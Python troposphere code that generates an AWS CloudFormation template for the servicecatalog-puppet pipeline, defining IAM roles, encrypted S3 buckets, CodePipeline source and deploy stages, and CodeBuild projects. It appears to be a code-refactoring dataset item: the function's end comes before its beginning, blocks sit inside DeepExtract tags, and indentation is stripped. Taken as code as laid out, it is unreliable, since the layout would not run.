template.add_resource(iam.Role(constants.REPORTING_ROLE_NAME, RoleName=constants.REPORTING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='ReportingActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:PutObject'], 'Resource': t.Sub('${LogStore.Arn}/*'), 'Effect': 'Allow'}, {'Action': ['cloudwatch:PutMetricData'], 'Resource': '*', 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.CACHE_DOWNLOADING_ROLE_NAME, RoleName=constants.CACHE_DOWNLOADING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='DownloadingCacheActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:GetObject'], 'Resource': t.Sub('${CachingBucket.Arn}/*'), 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(sns.Topic('DryRunNotificationTopic', DisplayName='service-catalog-puppet-dry-run-approvals', TopicName='service-catalog-puppet-dry-run-approvals', Condition='HasManualApprovals'))
deploy_role = template.add_resource(iam.Role('DeployRole', RoleName='PuppetDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_deploy_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
num_workers_ssm_parameter = template.add_resource(ssm.Parameter('NumWorkersSSMParameter', Type='String', Name='/servicecatalog-puppet/deploy/num-workers', Value=t.Sub('${DeployNumWorkers}')))
parameterised_source_bucket = template.add_resource(s3.Bucket('ParameterisedSourceBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-parameterised-runs-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage = codepipeline.Stages(Name='Source', Actions=[codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ParameterisedSource')], Configuration={'S3Bucket': t.Ref(parameterised_source_bucket), 'S3ObjectKey': 'parameters.zip', 'PollForSourceChanges': True}, Name='ParameterisedSource')])
install_spec = {'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}
deploy_env_vars = [{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Ref('AWS::AccountId')}, {'Type': 'PLAINTEXT', 'Name': 'PUPPET_REGION', 'Value': t.Ref('AWS::Region')}, {'Type': 'PARAMETER_STORE', 'Name': 'PARTITION', 'Value': t.Ref(partition_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_NAME', 'Value': t.Ref(puppet_role_name_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_PATH', 'Value': t.Ref(puppet_role_path_parameter)}]
if is_codecommit:
template.add_resource(codecommit.Repository('CodeRepo', RepositoryName=source.get('Configuration').get('RepositoryName'), RepositoryDescription='Repo to store the servicecatalog puppet solution', DeletionPolicy='Retain'))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeCommit'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'RepositoryName': source.get('Configuration').get('RepositoryName'), 'BranchName': source.get('Configuration').get('BranchName'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges', True)}, Name='Source'))
if is_github:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='ThirdParty', Version='1', Provider='GitHub'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'Owner': source.get('Configuration').get('Owner'), 'Repo': source.get('Configuration').get('Repo'), 'Branch': source.get('Configuration').get('Branch'), 'OAuthToken': t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:OAuthToken}}']), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
if is_custom:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='Custom', Version=source.get('Configuration').get('CustomActionTypeVersion'), Provider=source.get('Configuration').get('CustomActionTypeProvider')), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'GitUrl': source.get('Configuration').get('GitUrl'), 'Branch': source.get('Configuration').get('Branch'), 'PipelineName': t.Sub('${AWS::StackName}-pipeline')}, Name='Source'))
webhook = codepipeline.Webhook('Webhook', Authentication='IP', TargetAction='Source', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(AllowedIPRange=source.get('Configuration').get('GitWebHookIpAddress')), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.changes[0].ref.id', MatchEquals='refs/heads/{Branch}')], TargetPipelineVersion=1, TargetPipeline=t.Sub('${AWS::StackName}-pipeline'))
template.add_resource(webhook)
values_for_sub = {'GitUrl': source.get('Configuration').get('GitUrl'), 'WebhookUrl': t.GetAtt(webhook, 'Url')}
output_to_add = t.Output('WebhookUrl')
output_to_add.Value = t.Sub('${GitUrl}||${WebhookUrl}', **values_for_sub)
output_to_add.Export = t.Export(t.Sub('${AWS::StackName}-pipeline'))
template.add_output(output_to_add)
if is_codestarsourceconnection:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeStarSourceConnection'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'ConnectionArn': source.get('Configuration').get('ConnectionArn'), 'FullRepositoryId': source.get('Configuration').get('FullRepositoryId'), 'BranchName': source.get('Configuration').get('BranchName'), 'OutputArtifactFormat': source.get('Configuration').get('OutputArtifactFormat')}, Name='Source'))
if is_s3:
bucket_name = source.get('Configuration').get('S3Bucket')
if not scm_skip_creation_of_repo:
template.add_resource(s3.Bucket(bucket_name, PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=bucket_name, VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'S3Bucket': bucket_name, 'S3ObjectKey': source.get('Configuration').get('S3ObjectKey'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
<DeepExtract>
single_account_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "single_account: \\"${SINGLE_ACCOUNT_ID}\\"" > parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_account_run_project_args = dict(Name='servicecatalog-puppet-single-account-run', Description='Runs puppet for a single account - SINGLE_ACCOUNT_ID', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SINGLE_ACCOUNT_ID', 'Value': 'CHANGE_ME'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec)))
single_account_run_project = template.add_resource(codebuild.Project('SingleAccountRunProject', **single_account_run_project_args))
single_account_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_account_run_project_args['Name'] = 'servicecatalog-puppet-single-account-run-with-callback'
single_account_run_project_args['Description'] = 'Runs puppet for a single account - SINGLE_ACCOUNT_ID and then does a http put'
single_account_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_account_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec))
single_account_run_project_with_callback = template.add_resource(codebuild.Project('SingleAccountRunWithCallbackProject', **single_account_run_project_args))
</DeepExtract>
<DeepExtract>
single_action_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "section: \\"${SECTION}\\"" > parameters.yaml', 'echo "item: \\"${ITEM}\\"" >> parameters.yaml', 'echo "include_dependencies: \\"${INCLUDE_DEPENDENCIES}\\"" >> parameters.yaml', 'echo "include_reverse_dependencies: \\"${INCLUDE_REVERSE_DEPENDENCIES}\\"" >> parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_action_run_project_args = dict(Name='servicecatalog-puppet-single-action-run', Description='Runs puppet for a single action', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SECTION', 'Value': 'CHANGE_ME - launches|stacks|assertions|spoke-local-portfolios|etc'}, {'Type': 'PLAINTEXT', 'Name': 'ITEM', 'Value': 'CHANGE_ME - name of the launch|stack|assertion|etc'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include your specified items dependencies true|false'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_REVERSE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include things that depend on your specified item true|false'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec)))
single_action_run_project = template.add_resource(codebuild.Project('SingleActionRunProject', **single_action_run_project_args))
single_action_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_action_run_project_args['Name'] = 'servicecatalog-puppet-single-action-run-with-callback'
single_action_run_project_args['Description'] = 'Runs puppet for a single action and then does a http put'
single_action_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_action_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec))
single_action_run_project_with_callback = template.add_resource(codebuild.Project('SingleActionRunWithCallbackProject', **single_action_run_project_args))
</DeepExtract>
stages = [source_stage]
if should_validate:
template.add_resource(codebuild.Project('ValidateProject', Name='servicecatalog-puppet-validate', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': constants.PARTITION_ENVIRONMENTAL_VARIABLE_NAME, 'Value': config.get_partition()}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version='0.2', phases={'install': {'runtime-versions': {'python': '3.9'}, 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, 'build': {'commands': ['servicecatalog-puppet validate manifest.yaml']}})), Type='CODEPIPELINE'), Description='Validate the manifest.yaml file'))
stages.append(codepipeline.Stages(Name='Validate', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source')], Name='Validate', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ValidateProject')], Configuration={'ProjectName': t.Ref('ValidateProject'), 'PrimarySource': 'Source'}, RunOrder=1)]))
if is_manual_approvals:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='DryRun', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DryRunProject')], Configuration={'ProjectName': t.Ref('DryRunProject'), 'PrimarySource': 'Source'}, RunOrder=1), codepipeline.Actions(ActionTypeId=codepipeline.ActionTypeId(Category='Approval', Owner='AWS', Version='1', Provider='Manual'), Configuration={'NotificationArn': t.Ref('DryRunNotificationTopic'), 'CustomData': 'Approve when you are happy with the dry run.'}, Name='DryRunApproval', RunOrder=2), codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source'}, RunOrder=3)])
else:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source', 'EnvironmentVariables': '[{"name":"EXECUTION_ID","value":"#{codepipeline.PipelineExecutionId}","type":"PLAINTEXT"}]'}, RunOrder=1)])
stages.append(deploy_stage)
pipeline = template.add_resource(codepipeline.Pipeline('Pipeline', RoleArn=t.GetAtt('PipelineRole', 'Arn'), Stages=stages, Name=t.Sub('${AWS::StackName}-pipeline'), ArtifactStore=codepipeline.ArtifactStore(Type='S3', Location=t.Sub('sc-puppet-pipeline-artifacts-${AWS::AccountId}-${AWS::Region}')), RestartExecutionOnUpdate=True))
if is_github:
template.add_resource(codepipeline.Webhook('Webhook', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(SecretToken=t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:SecretToken}}'])), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.ref', MatchEquals='refs/heads/' + source.get('Configuration').get('Branch'))], Authentication='GITHUB_HMAC', TargetPipeline=t.Ref(pipeline), TargetAction='Source', Name=t.Sub('${AWS::StackName}-webhook'), TargetPipelineVersion=t.GetAtt(pipeline, 'Version'), RegisterWithThirdParty='true'))
deploy_project_build_spec = dict(version=0.2, phases=dict(install={'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, pre_build={'commands': ['servicecatalog-puppet --info expand --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml manifest.yaml', 'servicecatalog-puppet --info generate-task-reference $PWD/manifest-expanded.yaml']}, build={'commands': ['servicecatalog-puppet --info deploy-from-task-reference --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml --num-workers ${NUM_WORKERS} .']}), artifacts=dict(name='DeployProject', files=['*.yaml', 'manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks/*.json']))
deploy_project_args = dict(Name='servicecatalog-puppet-deploy', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PARAMETER_STORE', 'Name': 'NUM_WORKERS', 'Value': t.Ref(num_workers_ssm_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'SPOKE_EXECUTION_MODE_DEPLOY_ENV', 'Value': constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME}] + deploy_env_vars), Source=codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec)), Description='deploys out the products to be deployed')
deploy_project = template.add_resource(codebuild.Project('DeployProject', **deploy_project_args))
deploy_project_build_spec['phases']['build']['commands'] = ['servicecatalog-puppet --info dry-run manifest-expanded.yaml']
deploy_project_build_spec['artifacts']['name'] = 'DryRunProject'
deploy_project_args['Name'] = 'servicecatalog-puppet-dryrun'
deploy_project_args['Description'] = 'dry run of servicecatalog-puppet-dryrun'
deploy_project_args['Source'] = codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec))
dry_run_project = template.add_resource(codebuild.Project('DryRunProject', **deploy_project_args))
bootstrap_project = template.add_resource(codebuild.Project('BootstrapProject', Name='servicecatalog-puppet-bootstrap-spokes-in-ou', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'OU_OR_PATH', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_NAME', 'Value': 'OrganizationAccountAccessRole'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_ARNS', 'Value': ''}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': ''}]), Source=codebuild.Source(BuildSpec='version: 0.2\nphases:\n install:\n runtime-versions:\n python: 3.9\n commands:\n - pip install aws-service-catalog-puppet\n build:\n commands:\n - servicecatalog-puppet bootstrap-spokes-in-ou $OU_OR_PATH $IAM_ROLE_NAME $IAM_ROLE_ARNS ${OPTIONS}\nartifacts:\n files:\n - results/*/*\n - output/*/*\n name: BootstrapProject\n', Type='NO_SOURCE'), Description='Bootstrap all the accounts in an OU'))
template.add_resource(codebuild.Project('BootstrapASpokeProject', Name='servicecatalog-puppet-bootstrap-spoke', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Sub('${AWS::AccountId}')}, {'Type': 'PLAINTEXT', 'Name': 'ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'ASSUMABLE_ROLE_IN_ROOT_ACCOUNT', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': 'CHANGE_ME'}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['servicecatalog-puppet bootstrap-spoke-as ${PUPPET_ACCOUNT_ID} ${ASSUMABLE_ROLE_IN_ROOT_ACCOUNT} ${ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN} ${OPTIONS}']}))), Type='NO_SOURCE'), Description='Bootstrap given account as a spoke'))
cloud_formation_events_queue = template.add_resource(sqs.Queue('CloudFormationEventsQueue', QueueName='servicecatalog-puppet-cloudformation-events', Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'})))
cloud_formation_events_queue_policy = template.add_resource(sqs.QueuePolicy('CloudFormationEventsQueuePolicy', Queues=[t.Ref(cloud_formation_events_queue)], PolicyDocument={'Id': 'AllowSNS', 'Version': '2012-10-17', 'Statement': [{'Sid': 'allow-send-message', 'Effect': 'Allow', 'Principal': {'AWS': '*'}, 'Action': ['sqs:SendMessage'], 'Resource': '*', 'Condition': {'ArnEquals': {'aws:SourceArn': t.Sub('arn:${AWS::Partition}:sns:*:${AWS::AccountId}:servicecatalog-puppet-cloudformation-regional-events')}}}]}))
spoke_deploy_bucket = template.add_resource(s3.Bucket('SpokeDeployBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-spoke-deploy-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
caching_bucket = template.add_resource(s3.Bucket('CachingBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-caching-bucket-${AWS::AccountId}-${AWS::Region}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
template.add_output(t.Output('CloudFormationEventsQueueArn', Value=t.GetAtt(cloud_formation_events_queue, 'Arn')))
template.add_output(t.Output('Version', Value=t.GetAtt(param, 'Value')))
template.add_output(t.Output('ManualApprovalsParam', Value=t.GetAtt(manual_approvals_param, 'Value')))
template.add_resource(ssm.Parameter('DefaultTerraformVersion', Type='String', Name=constants.DEFAULT_TERRAFORM_VERSION_PARAMETER_NAME, Value=constants.DEFAULT_TERRAFORM_VERSION_VALUE))
return template
|
def get_template(puppet_version, all_regions, source, is_caching_enabled, is_manual_approvals: bool, scm_skip_creation_of_repo: bool, should_validate: bool) -> t.Template:
is_codecommit = source.get('Provider', '').lower() == 'codecommit'
is_github = source.get('Provider', '').lower() == 'github'
is_codestarsourceconnection = source.get('Provider', '').lower() == 'codestarsourceconnection'
is_custom = source.get('Provider', '').lower() == 'custom'
is_s3 = source.get('Provider', '').lower() == 's3'
description = f'Bootstrap template used to bring up the main ServiceCatalog-Puppet AWS CodePipeline with dependencies\n{{"version": "{puppet_version}", "framework": "servicecatalog-puppet", "role": "bootstrap-master"}}'
template = t.Template(Description=description)
version_parameter = template.add_parameter(t.Parameter('Version', Default=puppet_version, Type='String'))
org_iam_role_arn_parameter = template.add_parameter(t.Parameter('OrgIamRoleArn', Default='None', Type='String'))
with_manual_approvals_parameter = template.add_parameter(t.Parameter('WithManualApprovals', Type='String', AllowedValues=['Yes', 'No'], Default='No'))
puppet_code_pipeline_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetCodePipelineRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetCodePipelineRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
source_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('SourceRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the SourceRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_generate_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetGenerateRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetGenerateRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_deploy_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetDeployRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_provisioning_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('PuppetProvisioningRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetProvisioningRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
cloud_formation_deploy_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('CloudFormationDeployRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the CloudFormationDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('DeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type', Default='BUILD_GENERAL1_SMALL'))
spoke_deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('SpokeDeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type for spoke execution mode', Default='BUILD_GENERAL1_SMALL'))
deploy_num_workers_parameter = template.add_parameter(t.Parameter('DeployNumWorkers', Type='Number', Description='Number of workers that should be used when running a deploy', Default=10))
puppet_role_name_parameter = template.add_parameter(t.Parameter('PuppetRoleName', Type='String', Default='PuppetRole'))
puppet_role_path_template_parameter = template.add_parameter(t.Parameter('PuppetRolePath', Type='String', Default='/servicecatalog-puppet/'))
template.add_condition('ShouldUseOrgs', t.Not(t.Equals(t.Ref(org_iam_role_arn_parameter), 'None')))
template.add_condition('HasManualApprovals', t.Equals(t.Ref(with_manual_approvals_parameter), 'Yes'))
template.add_resource(s3.Bucket('StacksRepository', BucketName=t.Sub('sc-puppet-stacks-repository-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
